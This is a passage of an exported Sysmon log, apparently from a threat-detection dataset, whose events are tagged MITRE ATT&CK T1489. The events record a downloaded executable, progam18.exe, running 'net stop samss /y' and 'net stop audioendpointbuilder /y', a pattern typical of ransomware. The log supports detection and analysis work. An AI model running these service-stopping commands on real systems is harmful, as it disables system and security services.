""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d25d-5ec7-0000-001029034500} +ParentProcessId: 293800 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:41.744676900Z"",""eventRecordID"":""1352"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:41.742\r\nProcessGuid: {df9fc3d3-d25d-5ec7-0000-0010840f4500}\r\nProcessId: 293864\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d25d-5ec7-0000-001029034500}\r\nParentProcessId: 293800\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:41.742"",""processGuid"":""{df9fc3d3-d25d-5ec7-0000-0010840f4500}"",""processId"":""293864"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d25d-5ec7-0000-001029034500}"",""parentProcessId"":""293800"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:41:50.216",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:41.704 +ProcessGuid: {df9fc3d3-d25d-5ec7-0000-0010870d4500} +ProcessId: 293852 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe 
+CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:41.723032600Z"",""eventRecordID"":""1351"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:41.704\r\nProcessGuid: {df9fc3d3-d25d-5ec7-0000-0010870d4500}\r\nProcessId: 293852\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:41.704"",""processGuid"":""{df9fc3d3-d25d-5ec7-0000-0010870d4500}"",""processId"":""293852"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:41:50.209",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:41.460 +ProcessGuid: {df9fc3d3-d25d-5ec7-0000-001029034500} +ProcessId: 293800 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe 
+CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:41.485424600Z"",""eventRecordID"":""1350"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:41.460\r\nProcessGuid: {df9fc3d3-d25d-5ec7-0000-001029034500}\r\nProcessId: 293800\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:41.460"",""processGuid"":""{df9fc3d3-d25d-5ec7-0000-001029034500}"",""processId"":""293800"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:41:19.979",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:08.736 +ProcessGuid: {df9fc3d3-d23c-5ec7-0000-001001a84000} +ProcessId: 290648 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation 
+OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d23c-5ec7-0000-001023a04000} +ParentProcessId: 290572 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:08.744248600Z"",""eventRecordID"":""1346"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:08.736\r\nProcessGuid: {df9fc3d3-d23c-5ec7-0000-001001a84000}\r\nProcessId: 290648\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d23c-5ec7-0000-001023a04000}\r\nParentProcessId: 290572\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:08.736"",""processGuid"":""{df9fc3d3-d23c-5ec7-0000-001001a84000}"",""processId"":""290648"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d23c-5ec7-0000-001023a04000}"",""parentProcessId"":""290572"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:41:19.955",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:08.498 +ProcessGuid: {df9fc3d3-d23c-5ec7-0000-00107ba14000} +ProcessId: 290588 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop 
""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d23c-5ec7-0000-001089994000} +ParentProcessId: 290508 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:08.501771600Z"",""eventRecordID"":""1345"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:08.498\r\nProcessGuid: {df9fc3d3-d23c-5ec7-0000-00107ba14000}\r\nProcessId: 290588\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d23c-5ec7-0000-001089994000}\r\nParentProcessId: 290508\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:08.498"",""processGuid"":""{df9fc3d3-d23c-5ec7-0000-00107ba14000}"",""processId"":""290588"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d23c-5ec7-0000-001089994000}"",""parentProcessId"":""290508"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:41:19.945",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:08.446 +ProcessGuid: {df9fc3d3-d23c-5ec7-0000-001023a04000} +ProcessId: 290572 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe 
+CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:08.460043700Z"",""eventRecordID"":""1344"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:08.446\r\nProcessGuid: {df9fc3d3-d23c-5ec7-0000-001023a04000}\r\nProcessId: 290572\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:08.446"",""processGuid"":""{df9fc3d3-d23c-5ec7-0000-001023a04000}"",""processId"":""290572"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:41:19.937",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:08.149 +ProcessGuid: {df9fc3d3-d23c-5ec7-0000-001089994000} +ProcessId: 290508 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe 
+CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:08.163605900Z"",""eventRecordID"":""1343"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:08.149\r\nProcessGuid: {df9fc3d3-d23c-5ec7-0000-001089994000}\r\nProcessId: 290508\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
